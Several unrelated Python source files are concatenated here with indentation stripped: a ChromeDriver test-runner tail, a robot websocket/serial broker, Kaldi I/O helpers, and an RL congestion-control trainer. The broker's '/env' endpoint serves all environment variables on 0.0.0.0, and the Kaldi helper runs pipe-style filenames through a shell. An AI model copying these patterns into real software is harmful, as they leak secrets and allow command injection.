help=('Android package key. Possible values: ' +
str(_ANDROID_NEGATIVE_FILTER.keys())))
options, args = parser.parse_args()
options.chromedriver = util.GetAbsolutePathOfUserPath(options.chromedriver)
if not options.chromedriver or not os.path.exists(options.chromedriver):
parser.error('chromedriver is required or the given path is invalid.' +
'Please run "%s --help" for help' % __file__)
global _CHROMEDRIVER_BINARY
_CHROMEDRIVER_BINARY = options.chromedriver
if (options.android_package and
options.android_package not in _ANDROID_NEGATIVE_FILTER):
parser.error('Invalid --android-package')
chromedriver_server = server.Server(_CHROMEDRIVER_BINARY, options.log_path)
global _CHROMEDRIVER_SERVER_URL
_CHROMEDRIVER_SERVER_URL = chromedriver_server.GetUrl()
global _REFERENCE_CHROMEDRIVER
_REFERENCE_CHROMEDRIVER = util.GetAbsolutePathOfUserPath(
options.reference_chromedriver)
global _CHROME_BINARY
if options.chrome:
_CHROME_BINARY = util.GetAbsolutePathOfUserPath(options.chrome)
else:
_CHROME_BINARY = None
global _ANDROID_PACKAGE_KEY
_ANDROID_PACKAGE_KEY = options.android_package
if options.filter == '*':
if _ANDROID_PACKAGE_KEY:
negative_filter = _ANDROID_NEGATIVE_FILTER[_ANDROID_PACKAGE_KEY]
else:
negative_filter = _GetDesktopNegativeFilter(options.chrome_version)
options.filter = '*-' + ':__main__.'.join([''] + negative_filter)
all_tests_suite = unittest.defaultTestLoader.loadTestsFromModule(
sys.modules[__name__])
tests = unittest_util.FilterTestSuite(all_tests_suite, options.filter)
ChromeDriverTest.GlobalSetUp()
MobileEmulationCapabilityTest.GlobalSetUp()
result = unittest.TextTestRunner(stream=sys.stdout, verbosity=2).run(tests)
ChromeDriverTest.GlobalTearDown()
MobileEmulationCapabilityTest.GlobalTearDown()
sys.exit(len(result.failures) + len(result.errors))
|
broker.py | import os
import signal
import sys
import struct
import threading
import argparse
import websockets
import asyncio
import json
from random import random
from collections import defaultdict
from http.server import HTTPServer, SimpleHTTPRequestHandler
try:
import zmq
except:
pass # ZMQ not needed as a dependency on the robot itself
PACKET_START_BYTE = 0x02 # Matches ../firmware/hal/micro/comms.cpp
MAX_BUFFERED_MESSAGES = 10
class Broker():
def __init__(self, dest, pull=None, motion=None):
self.motion = motion
self.sock = None
self.push = None
self.pull = None
self.q = asyncio.Queue()
if dest.startswith('/dev'):
print("Opening serial connection:", dest)
import serial
self.sock = serial.Serial(port=dest, baudrate=115200, timeout=0.1)
else: # Network
# Socket to talk to server
self.ctx = zmq.Context()
print("Connecting to fw comms PUSH socket:", dest)
self.push = self.ctx.socket(zmq.PUSH)
self.push.connect(dest)
print("Connecting to fw comms PULL socket:", pull)
self.pull = self.ctx.socket(zmq.PULL)
self.pull.connect(pull)
def read_forever(self):
print("Starting comms read loop")
if self.pull is not None:
while True:
try:
data = self.pull.recv()
except zmq.error.Again:
continue
self.q.put_nowait(data)
else:
while True:
stuff = self.sock.read_until(bytes([PACKET_START_BYTE]))
if stuff == b'':
print("No serial data")
continue
sz = self.sock.read(1)
if len(sz) != 1:
print("ERR serial could not read size after sync byte; runup:", stuff[-10:])
continue
sz = int(sz[0])
# Bound the queue size, but without throwing QueueFull exceptions as the usual implementation goes
while self.q.qsize() > MAX_BUFFERED_MESSAGES:
self.q.get_nowait()
if sz == PACKET_START_BYTE: # Print status messages to console
s = '[FW] ' + self.sock.read_until(bytes([0])).decode('utf-8').rstrip('\x00\n\r')
print(s)
self.q.put_nowait(s)
continue
else:
# Note: we don't do any length checking - this is the responsibility of the consumer
self.q.put_nowait(self.sock.read(sz))
async def recv_forever(self, ws):
while True:
msg = await self.q.get()
await ws.send(msg)
def send(self, req):
if self.sock is not None:
self.sock.write(bytes([PACKET_START_BYTE, len(req)]))
self.sock.write(req)
self.sock.flush()
else:
self.push.send(req)
conn = None
def sigterm_handler(_signo, _stack_frame):
sys.exit(0)
signal.signal(signal.SIGTERM, sigterm_handler)
class WebServer(SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == "/env":
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes(json.dumps(dict(os.environ)), "utf-8"))
else:
return SimpleHTTPRequestHandler.do_GET(self)
async def handle_socket(ws, path):
print("WS conn", str(ws))
if args.loopback:
await ws_to_conn(ws)
else:
await asyncio.gather(ws_to_conn(ws), conn.recv_forever(ws))
async def ws_to_conn(ws):
print("Starting ws_to_conn")
async for req in ws:
if args.loopback:
await asyncio.sleep(0.1)
await ws.send(req)
if random() < 0.05:
await ws.send('[FW] test loopback message')
else:
conn.send(req)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--motion', default="passthrough", help="Type of motion control to use")
parser.add_argument('--loopback', action='store_true', default=False, help="Transmit to self, for testing")
parser.add_argument('--dest', default="tcp://0.0.0.0:5559", help="Destination (ZMQ socket or serial dev path)")
parser.add_argument('--pull', default="tcp://0.0.0.0:5558", help="PULL socket destination (ignored when --dest is serial")
parser.add_argument('--websocket_port', default=8001, help="Port for websocket control")
parser.add_argument('--http_port', default=8000, help="Port for HTTP server")
parser.add_argument('--web_dir', default="www", help="Web dir (relative to .py script)")
args = parser.parse_args(sys.argv[1:])
web_dir = os.path.join(os.path.dirname(__file__), args.web_dir)
print("Serving files from", web_dir)
os.chdir(web_dir)
# Webserver for html page
WEB_SERVER_ADDR = ("0.0.0.0", args.http_port)
srv = HTTPServer(WEB_SERVER_ADDR, WebServer)
threading.Thread(target=srv.serve_forever, daemon=True).start()
print("Started web server", str(WEB_SERVER_ADDR))
# Websocket for streaming comms from web client
WS_SERVER_ADDR = ("0.0.0.0", args.websocket_port)
wssrv = websockets.serve(handle_socket, WS_SERVER_ADDR[0], WS_SERVER_ADDR[1])
if not args.loopback:
conn = Broker(args.dest, args.pull, args.motion)
threading.Thread(target=conn.read_forever, daemon=True).start()
asyncio.get_event_loop().run_until_complete(wssrv)
print("Starting websocket server", str(WS_SERVER_ADDR))
asyncio.get_event_loop().run_forever()
|
kaldi_io.py | #!/usr/bin/env python
# Copyright 2014-2016 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License")
import numpy as np
import sys
import os
import re
import gzip
import struct
#################################################
# Adding kaldi tools to shell path,
# Select kaldi,
if 'KALDI_ROOT' not in os.environ:
# Default! To change run python with 'export KALDI_ROOT=/some_dir python'
os.environ['KALDI_ROOT'] = '/home/lijianchen/kaldi'
# Add kaldi tools to path,
os.environ['PATH'] = os.popen('echo $KALDI_ROOT/src/bin:'
'$KALDI_ROOT/tools/openfst/bin:'
'$KALDI_ROOT/src/fstbin/:'
'$KALDI_ROOT/src/gmmbin/:'
'$KALDI_ROOT/src/featbin/:'
'$KALDI_ROOT/src/lm/:'
'$KALDI_ROOT/src/sgmmbin/:'
'$KALDI_ROOT/src/sgmm2bin/:'
'$KALDI_ROOT/src/fgmmbin/:'
'$KALDI_ROOT/src/latbin/:'
'$KALDI_ROOT/src/nnetbin:'
'$KALDI_ROOT/src/nnet2bin:'
'$KALDI_ROOT/src/nnet3bin:'
'$KALDI_ROOT/src/online2bin/:'
'$KALDI_ROOT/src/ivectorbin/:'
'$KALDI_ROOT/src/lmbin/').readline().strip() + \
':' + os.environ['PATH']
#################################################
# Define all custom exceptions,
class UnsupportedDataType(Exception):
pass
class UnknownVectorHeader(Exception):
pass
class UnknownMatrixHeader(Exception):
pass
class BadSampleSize(Exception):
pass
class BadInputFormat(Exception):
pass
class SubprocessFailed(Exception):
pass
#################################################
# Data-type independent helper functions,
def open_or_fd(file, mode='rb'):
""" fd = open_or_fd(file)
Open file, gzipped file, pipe, or forward the file-descriptor.
Eventually seeks in the 'file' argument contains ':offset' suffix.
"""
offset = None
try:
# strip 'ark:' prefix from r{x,w}filename (optional),
if re.search('^(ark|scp)(,scp|,b|,t|,n?f|,n?p|,b?o|,n?s|,n?cs)*:', file):
(prefix, file) = file.split(':', 1)
# separate offset from filename (optional),
if re.search(':[0-9]+$', file):
(file, offset) = file.rsplit(':', 1)
# input pipe?
if file[-1] == '|':
fd = popen(file[:-1], 'rb') # custom,
# output pipe?
elif file[0] == '|':
fd = popen(file[1:], 'wb') # custom,
# is it gzipped?
elif file.split('.')[-1] == 'gz':
fd = gzip.open(file, mode)
# a normal file...
else:
fd = open(file, mode)
except TypeError:
# 'file' is opened file descriptor,
fd = file
# Eventually seek to offset,
if offset != None:
fd.seek(int(offset))
return fd
# based on '/usr/local/lib/python3.4/os.py'
def popen(cmd, mode="rb"):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
import subprocess
import io
import threading
# cleanup function for subprocesses,
def cleanup(proc, cmd):
ret = proc.wait()
if ret > 0:
raise SubprocessFailed('cmd %s returned %d !' % (cmd, ret))
return
# text-mode,
if mode == "r":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup, args=(proc, cmd)
).start() # clean-up thread,
return io.TextIOWrapper(proc.stdout)
elif mode == "w":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup, args=(proc, cmd)
).start() # clean-up thread,
return io.TextIOWrapper(proc.stdin)
# binary,
elif mode == "rb":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup, args=(proc, cmd)
).start() # clean-up thread,
return proc.stdout
elif mode == "wb":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup, args=(proc, cmd)
).start() # clean-up thread,
return proc.stdin
# sanity,
else:
raise ValueError("invalid mode %s" % mode)
def read_key(fd):
""" [key] = read_key(fd)
Read the utterance-key from the opened ark/stream descriptor 'fd'.
"""
key = ''
while 1:
char = fd.read(1).decode()
if char == '':
break
if char == ' ':
break
key += char
key = key.strip()
if key == '':
return None # end of file,
assert(re.match('^[\.\/a-zA-Z0-9_-]+$', key) != None) # check format,
return key
#################################################
# Integer vectors (alignments, ...),
def read_ali_ark(file_or_fd):
""" Alias to 'read_vec_int_ark()' """
return read_vec_int_ark(file_or_fd)
def read_vec_int_ark(file_or_fd):
""" generator(key,vec) = read_vec_int_ark(file_or_fd)
Create generator of (key,vector<int>) tuples, which reads from the ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_int_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_int(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd:
fd.close()
def read_vec_int(file_or_fd):
""" [int-vec] = read_vec_int(file_or_fd)
Read kaldi integer vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
assert(fd.read(1).decode() == '\4') # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[
0] # vector dim
# Elements from int32 vector are sored in tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(
vec_size*5), dtype=[('size', 'int8'), ('value', 'int32')], count=vec_size)
assert(vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('[')
arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=int)
if fd is not file_or_fd:
fd.close() # cleanup
return ans
# Writing,
def write_vec_int(file_or_fd, v, key=''):
""" write_vec_int(f, v, key='')
Write a binary kaldi integer vector to filename or stream.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_int(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3:
assert(fd.mode == 'wb')
try:
if key != '':
fd.write((key+' ').encode()) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# dim,
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v.shape[0]))
# data,
for i in range(len(v)):
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v[i])) # binary,
finally:
if fd is not file_or_fd:
fd.close()
#################################################
# Float vectors (confidences, ivectors, ...),
# Reading,
def read_vec_flt_scp(file_or_fd):
""" generator(key,mat) = read_vec_flt_scp(file_or_fd)
Returns generator of (key,vector) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,vec in kaldi_io.read_vec_flt_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key, rxfile) = line.decode().split(' ')
vec = read_vec_flt(rxfile)
yield key, vec
finally:
if fd is not file_or_fd:
fd.close()
def read_vec_flt_ark(file_or_fd):
""" generator(key,vec) = read_vec_flt_ark(file_or_fd)
Create generator of (key,vector<float>) tuples, reading from an ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_flt_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_flt(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd:
fd.close()
def read_vec_flt(file_or_fd):
""" [flt-vec] = read_vec_flt(file_or_fd)
Read kaldi float vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
# Data type,
header = fd.read(3).decode()
if header == 'FV ':
sample_size = 4 # floats
elif header == 'DV ':
sample_size = 8 # doubles
else:
raise UnknownVectorHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimension,
assert(fd.read(1).decode() == '\4') # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[
0] # vector dim
# Read whole vector,
buf = fd.read(vec_size * sample_size)
if sample_size == 4:
ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8:
ans = np.frombuffer(buf, dtype='float64')
else:
raise BadSampleSize
return ans
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('[')
arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=float)
if fd is not file_or_fd:
fd.close() # cleanup
return ans
# Writing,
def write_vec_flt(file_or_fd, v, key=''):
""" write_vec_flt(f, v, key='')
Write a binary kaldi vector to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_flt(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3:
assert(fd.mode == 'wb')
try:
if key != '':
fd.write((key+' ').encode()) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if v.dtype == 'float32':
fd.write('FV '.encode())
elif v.dtype == 'float64':
fd.write('DV '.encode())
else:
raise UnsupportedDataType(
"'%s', please use 'float32' or 'float64'" % v.dtype)
# Dim,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, v.shape[0])) # dim
# Data,
fd.write(v.tobytes())
finally:
if fd is not file_or_fd:
fd.close()
#################################################
# Float matrices (features, transformations, ...),
# Reading,
def read_mat_scp(file_or_fd):
""" generator(key,mat) = read_mat_scp(file_or_fd)
Returns generator of (key,matrix) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,mat in kaldi_io.read_mat_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key, rxfile) = line.decode().split(' ')
mat = read_mat(rxfile)
yield key, mat
finally:
if fd is not file_or_fd:
fd.close()
def read_mat_ark(file_or_fd):
""" generator(key,mat) = read_mat_ark(file_or_fd)
Returns generator of (key,matrix) tuples, read from ark file/stream.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the ark:
for key,mat in kaldi_io.read_mat_ark(file):
...
Read ark to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
mat = read_mat(fd)
yield key, mat
key = read_key(fd)
finally:
if fd is not file_or_fd:
fd.close()
def read_mat(file_or_fd):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
"""
fd = open_or_fd(file_or_fd)
try:
binary = fd.read(2).decode()
if binary == '\0B':
mat = _read_mat_binary(fd)
else:
assert(binary == ' [')
mat = _read_mat_ascii(fd)
finally:
if fd is not file_or_fd:
fd.close()
return mat
def _read_mat_binary(fd):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'):
return _read_compressed_mat(fd, header)
elif header == 'FM ':
sample_size = 4 # floats
elif header == 'DM ':
sample_size = 8 # doubles
else:
raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(
fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(rows * cols * sample_size)
if sample_size == 4:
vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8:
vec = np.frombuffer(buf, dtype='float64')
else:
raise BadSampleSize
mat = np.reshape(vec, (rows, cols))
return mat
def _read_mat_ascii(fd):
rows = []
while 1:
line = fd.readline().decode()
if (len(line) == 0):
raise BadInputFormat # eof, should not happen!
if len(line.strip()) == 0:
continue # skip empty line
arr = line.strip().split()
if arr[-1] != ']':
rows.append(np.array(arr, dtype='float32')) # not last line
else:
rows.append(np.array(arr[:-1], dtype='float32')) # last line
mat = np.vstack(rows)
return mat
def _read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue', 'float32'), ('range', 'float32'), (
'num_rows', 'int32'), ('num_cols', 'int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0', 'uint16'), ('percentile_25',
'uint16'), ('percentile_75', 'uint16'), ('percentile_100', 'uint16')])
# Mapping for percentiles in col-headers,
def uint16_to_float(value, min, range):
return np.float32(min + range * 1.52590218966964e-05 * value)
# Mapping for matrix elements,
def uint8_to_float_v2(vec, p0, p25, p75, p100):
# Split the vector by masks,
mask_0_64 = (vec <= 64)
mask_65_192 = np.all([vec > 64, vec <= 192], axis=0)
mask_193_255 = (vec > 192)
# Sanity check (useful but slow...),
# assert(len(vec) == np.sum(np.hstack([mask_0_64,mask_65_192,mask_193_255])))
# assert(len(vec) == np.sum(np.any([mask_0_64,mask_65_192,mask_193_255], axis=0)))
# Build the float vector,
ans = np.empty(len(vec), dtype='float32')
ans[mask_0_64] = p0 + (p25 - p0) / 64. * vec[mask_0_64]
ans[mask_65_192] = p25 + (p75 - p25) / 128. * (vec[mask_65_192] - 64)
ans[mask_193_255] = p75 + (p100 - p75) / \
63. * (vec[mask_193_255] - 192)
return ans
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(
fd.read(16), dtype=global_header, count=1)[0]
# The data is structed as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
col_headers = np.frombuffer(
fd.read(cols*8), dtype=per_col_header, count=cols)
data = np.reshape(np.frombuffer(fd.read(cols*rows), dtype='uint8',
count=cols*rows), newshape=(cols, rows)) # stored as col-major,
mat = np.empty((cols, rows), dtype='float32')
for i, col_header in enumerate(col_headers):
col_header_flt = [uint16_to_float(
percentile, globmin, globrange) for percentile in col_header]
mat[i] = uint8_to_float_v2(data[i], *col_header_flt)
return mat.T # transpose! col-major -> row-major,
# Writing,
def write_mat(file_or_fd, m, key=''):
""" write_mat(f, m, key='')
Write a binary kaldi matrix to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename of opened file descriptor for writing,
m : the matrix to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the matrix.
Example of writing single matrix:
kaldi_io.write_mat(filename, mat)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,mat in dict.iteritems():
kaldi_io.write_mat(f, mat, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3:
assert(fd.mode == 'wb')
try:
if key != '':
fd.write((key+' ').encode()) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if m.dtype == 'float32':
fd.write('FM '.encode())
elif m.dtype == 'float64':
fd.write('DM '.encode())
else:
raise UnsupportedDataType(
"'%s', please use 'float32' or 'float64'" % m.dtype)
# Dims,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[0])) # rows
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[1])) # cols
# Data,
fd.write(m.tobytes())
finally:
if fd is not file_or_fd:
fd.close()
#################################################
# 'Posterior' kaldi type (posteriors, confusion network, nnet1 training targets, ...)
# Corresponds to: vector<vector<tuple<int,float> > >
# - outer vector: time axis
# - inner vector: records at the time
# - tuple: int = index, float = value
#
def read_cnet_ark(file_or_fd):
""" Alias of function 'read_post_ark()', 'cnet' = confusion network """
return read_post_ark(file_or_fd)
def read_post_ark(file_or_fd):
""" generator(key,vec<vec<int,float>>) = read_post_ark(file)
Returns generator of (key,posterior) tuples, read from ark file.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,post in kaldi_io.read_post_ark(file):
...
Read ark to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
post = read_post(fd)
yield key, post
key = read_key(fd)
finally:
if fd is not file_or_fd:
fd.close()
def read_post(file_or_fd):
""" [post] = read_post(file_or_fd)
Reads single kaldi 'Posterior' in binary format.
The 'Posterior' is C++ type 'vector<vector<tuple<int,float> > >',
the outer-vector is usually time axis, inner-vector are the records
at given time, and the tuple is composed of an 'index' (integer)
and a 'float-value'. The 'float-value' can represent a probability
or any other numeric value.
Returns vector of vectors of tuples.
"""
fd = open_or_fd(file_or_fd)
ans = []
binary = fd.read(2).decode()
assert(binary == '\0B') # binary flag
assert(fd.read(1).decode() == '\4') # int-size
outer_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[
0] # number of frames (or bins)
# Loop over 'outer-vector',
for i in range(outer_vec_size):
assert(fd.read(1).decode() == '\4') # int-size
inner_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[
0] # number of records for frame (or bin)
data = np.frombuffer(fd.read(inner_vec_size*10), dtype=[('size_idx', 'int8'), (
'idx', 'int32'), ('size_post', 'int8'), ('post', 'float32')], count=inner_vec_size)
assert(data[0]['size_idx'] == 4)
assert(data[0]['size_post'] == 4)
ans.append(data[['idx', 'post']].tolist())
if fd is not file_or_fd:
fd.close()
return ans
#################################################
# Kaldi Confusion Network bin begin/end times,
# (kaldi stores CNs time info separately from the Posterior).
#
def read_cntime_ark(file_or_fd):
""" generator(key,vec<tuple<float,float>>) = read_cntime_ark(file_or_fd)
Returns generator of (key,cntime) tuples, read from ark file.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Iterate the ark:
for key,time in kaldi_io.read_cntime_ark(file):
...
Read ark to a 'dictionary':
d = { key:time for key,time in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
cntime = read_cntime(fd)
yield key, cntime
key = read_key(fd)
finally:
if fd is not file_or_fd:
fd.close()
def read_cntime(file_or_fd):
""" [cntime] = read_cntime(file_or_fd)
Reads single kaldi 'Confusion Network time info', in binary format:
C++ type: vector<tuple<float,float> >.
(begin/end times of bins at the confusion network).
Binary layout is '<num-bins> <beg1> <end1> <beg2> <end2> ...'
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Returns vector of tuples.
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
assert(binary == '\0B') # assuming it's binary
assert(fd.read(1).decode() == '\4') # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[
0] # number of frames (or bins)
data = np.frombuffer(fd.read(vec_size*10), dtype=[('size_beg', 'int8'), (
't_beg', 'float32'), ('size_end', 'int8'), ('t_end', 'float32')], count=vec_size)
assert(data[0]['size_beg'] == 4)
assert(data[0]['size_end'] == 4)
# Return vector of tuples (t_beg,t_end),
ans = data[['t_beg', 't_end']].tolist()
if fd is not file_or_fd:
fd.close()
return ans
#################################################
# Segments related,
#
# Segments as 'Bool vectors' can be handy,
# - for 'superposing' the segmentations,
# - for frame-selection in Speaker-ID experiments,
def read_segments_as_bool_vec(segments_file):
""" [ bool_vec ] = read_segments_as_bool_vec(segments_file)
using kaldi 'segments' file for 1 wav, format : '<utt> <rec> <t-beg> <t-end>'
- t-beg, t-end is in seconds,
- assumed 100 frames/second,
"""
segs = np.loadtxt(segments_file, dtype='object,object,f,f', ndmin=1)
# Sanity checks,
assert(len(segs) > 0) # empty segmentation is an error,
# segments with only 1 wav-file,
assert(len(np.unique([rec[1] for rec in segs])) == 1)
# Convert time to frame-indexes,
start = np.rint([100 * rec[2] for rec in segs]).astype(int)
end = np.rint([100 * rec[3] for rec in segs]).astype(int)
# Taken from 'read_lab_to_bool_vec', htk.py,
frms = np.repeat(np.r_[np.tile([False, True], len(end)), False],
np.r_[np.c_[start - np.r_[0, end[:-1]], end-start].flat, 0])
assert np.sum(end-start) == np.sum(frms)
return frms
|
d5 copy.py | '''
MIT License
Copyright (c) Chen-Yu Yen - Soheil Abbasloo 2020
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import threading
import logging
import tensorflow as tf
import sys
from agent import Agent
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import argparse
import gym
import numpy as np
import time
import random
import datetime
import sysv_ipc
import signal
import pickle
from utils import logger, Params
from envwrapper import Env_Wrapper, TCP_Env_Wrapper, GYM_Env_Wrapper
def create_input_op_shape(obs, tensor):
input_shape = [x or -1 for x in tensor.shape.as_list()]
return np.reshape(obs, input_shape)
def evaluate_TCP(env, agent, epoch, summary_writer, params, s0_rec_buffer, eval_step_counter):
score_list = []
eval_times = 1
eval_length = params.dict['max_eps_steps']
start_time = time.time()
for _ in range(eval_times):
step_counter = 0
ep_r = 0.0
if not params.dict['use_TCP']:
s0 = env.reset()
if params.dict['recurrent']:
a = agent.get_action(s0_rec_buffer, False)
else:
a = agent.get_action(s0, False)
a = env.map_action(a[0][0])
print("matthew:a:"+str(a))
env.write_action(a)
while True:
eval_step_counter += 1
step_counter += 1
s1, r, terminal, error_code,ccc = env.step(a, eval_=True)
if error_code == True:
s1_rec_buffer = np.concatenate( (s0_rec_buffer[params.dict['state_dim']:], s1) )
if params.dict['recurrent']:
a1 = agent.get_action(s1_rec_buffer, False)
else:
a1 = agent.get_action(s1, False)
a1 = env.map_action(a1[0][0])
env.write_action(a1)
print("matthew:a1:"+str(a1))
else:
print("Invalid state received...\n")
env.write_action(a)
continue
ep_r = ep_r+r
if (step_counter+1) % params.dict['tb_interval'] == 0:
summary = tf.summary.Summary()
summary.value.add(tag='Eval/Step/0-Actions', simple_value=env.map_action(a))
summary.value.add(tag='Eval/Step/2-Reward', simple_value=r)
summary_writer.add_summary(summary, eval_step_counter)
s0 = s1
a = a1
if params.dict['recurrent']:
s0_rec_buffer = s1_rec_buffer
if step_counter == eval_length or terminal:
score_list.append(ep_r)
break
summary = tf.summary.Summary()
summary.value.add(tag='Eval/Return', simple_value=np.mean(score_list))
summary_writer.add_summary(summary, epoch)
return eval_step_counter
class learner_killer():
def __init__(self, buffer):
self.replay_buf = buffer
print("learner register sigterm")
signal.signal(signal.SIGTERM, self.handler_term)
print("test length:", self.replay_buf.length_buf)
def handler_term(self, signum, frame):
if not config.eval:
with open(os.path.join(params.dict['train_dir'], "replay_memory.pkl"), "wb") as fp:
pickle.dump(self.replay_buf, fp)
print("test length:", self.replay_buf.length_buf)
print("--------------------------Learner: Saving rp memory--------------------------")
print("-----------------------Learner's killed---------------------")
sys.exit(0)
class Orca_state(object):
"""
docstring
"""
Ordinary = 0
